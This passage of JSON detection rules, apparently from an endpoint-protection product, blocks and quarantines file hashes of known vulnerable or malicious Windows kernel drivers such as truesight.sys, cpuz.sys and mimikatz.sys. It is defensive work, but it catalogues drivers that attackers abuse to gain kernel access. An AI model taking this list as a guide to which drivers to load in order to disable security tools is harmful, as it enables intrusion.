+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": 
true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c14bea0d85c9cad5c5f5c8d0e5442f6deb9e93fe3ad8ea5e8e147821c6f9304",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c077017e-28cb-5b91-9dab-85b0723adf9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153175Z",
+ "creation_date": "2026-03-23T11:45:31.153178Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "22d4ebe019788d7d9a7ab2e9e6ad1693dc0ebf8388666aba2de97dd59ee4bf02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c07a1478-e1be-5749-b54d-0e4e936500af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ 
"effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815598Z",
+ "creation_date": "2026-03-23T11:45:31.815601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ae049742c126352ad859127676551110405bbcabec461d637d3998241017a0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c07ac49f-338e-53bf-8fe7-9b3b031d3e26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826920Z",
+ "creation_date": "2026-03-23T11:45:30.826922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ 
"references": [],
+ "type": "hash",
+ "value": "bb6710e984a8ce820b30f58ddd46c775b2b6136edcde493591ac4f3e48a9bc06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0916b8a-50e2-50e9-bc14-3eb7359839ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145395Z",
+ "creation_date": "2026-03-23T11:45:31.145397Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb2597916344decf1afbdb771ab8d9ab3896be186f1fe20ef905273ed73e3629",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c09ea503-c0e2-521b-a260-cb89b4de2d21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149371Z",
+ "creation_date": "2026-03-23T11:45:31.149373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a16b0c655899e6bda9c8ece578726f638bbed70ae9a5a3140e1a5338c012607",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0aad242-4b17-51b4-a2df-9d24c1ab726b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149981Z",
+ "creation_date": "2026-03-23T11:45:31.149983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2cf29afe28aafd0e1ccbae0658cd58afb461355e625f0469585a2a6def12ae5",
+ "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ac1726-04c6-5642-a4a3-85acd31ee339",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610776Z",
+ "creation_date": "2026-03-23T11:45:29.610778Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610784Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c50f8ab8538c557963252b702c1bd3cee4604b5fc2497705d2a6a3fd87e3cc26",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ac5730-021b-5fae-9faa-937019673722",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ 
"last_update": "2026-03-23T11:45:30.473976Z",
+ "creation_date": "2026-03-23T11:45:30.473979Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473988Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5380daf2497ed35fc6d8b2a2f343dcbb95bb7384eea73781126a641ba3391af8",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0cc64d3-deff-5e43-a7bb-139aa90d9702",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606995Z",
+ "creation_date": "2026-03-23T11:45:29.606997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4859c5456d03f799de89d2f8cbb36b4518259a6c7c0bc909b1fd16f48363d5a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": 
"c0d04003-ef54-51cd-a08c-b1e2087513d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475913Z",
+ "creation_date": "2026-03-23T11:45:31.475917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d233b5fb67cafe05c29c6d97646bd398b7eec950d1375ee898f2ad6dbacb11c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d16b99-aff2-5688-a0f6-e0b3e6aa6fd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819976Z",
+ "creation_date": "2026-03-23T11:45:30.819978Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ 
"hl_testing_start_time": "2026-03-23T11:45:30.819984Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "283a2e3eb9bad973e2ec439208f1bfb5121f8d9c37019b8a699be212f05964eb",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d54b16-a6ef-5b19-adc6-79ae755d1515",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146510Z",
+ "creation_date": "2026-03-23T11:45:31.146512Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b250c6e21e8393c8f707fef88d4f0afc6ad24cef8590d3f6b269bc75fc4185b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0d5bd27-7d43-551d-bd51-d19f9158fe72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": 
"quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807483Z",
+ "creation_date": "2026-03-23T11:45:31.807486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0aa450b1279a90d388466fb7b00a1663bb72d2e70efa1082044e23b18a5c62ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0db53d7-324e-59e9-ae5f-6aab7fea03a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980289Z",
+ "creation_date": "2026-03-23T11:45:29.980291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0e16a20-2f4b-5e41-9ae8-556b1f851306",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818794Z",
+ "creation_date": "2026-03-23T11:45:31.818797Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b1437d1b7ea3e5b9be6c669db906b70ef958c6e1df62592a2e3ee43b210a3e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0e9aa31-fe03-57d0-9b57-a9ca54d28c9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ 
"username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149807Z",
+ "creation_date": "2026-03-23T11:45:31.149810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1614e43c7556bcf6867d7c528ea7f7dc70a2bd90ef17ea35e85af1663a8b62d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ecc777-a616-59dd-a21d-6851e8f058ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472560Z",
+ "creation_date": "2026-03-23T11:45:30.472563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "368a9c2b6f12adbe2ba65181fb96f8b0d2241e4eae9f3ce3e20e50c3a3cc9aa1",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) 
[https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0ff4a9c-a10c-59b8-b1e7-8a31631dec95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827194Z",
+ "creation_date": "2026-03-23T11:45:31.827196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "266634c80d0a590988a6eaf326be0b04dfd346c56cc3d1a8e5def6dc0f9a33cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c1029495-dc2b-58db-b570-a956d5d4788a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832205Z",
+ "creation_date": 
"2026-03-23T11:45:30.832207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b6837a6b5af391099ddf151ad7a220d2ef95b169d1bcca4e5d9ce121252d918",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c105e7f2-c4cb-5e13-89dc-0a90a6dc5d5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471713Z",
+ "creation_date": "2026-03-23T11:45:30.471716Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c10b25ca-bcf0-5043-bd5f-1212d4ffa66e",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832388Z",
+ "creation_date": "2026-03-23T11:45:30.832390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832396Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "799cb4ddae59494541ad811507438aeb0615ed08a2e903cb66c3dd923044b952",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c10c6634-195b-580e-8abe-8306bf287c05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826371Z",
+ "creation_date": "2026-03-23T11:45:30.826373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": 
"2026-03-23T11:45:30.826379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
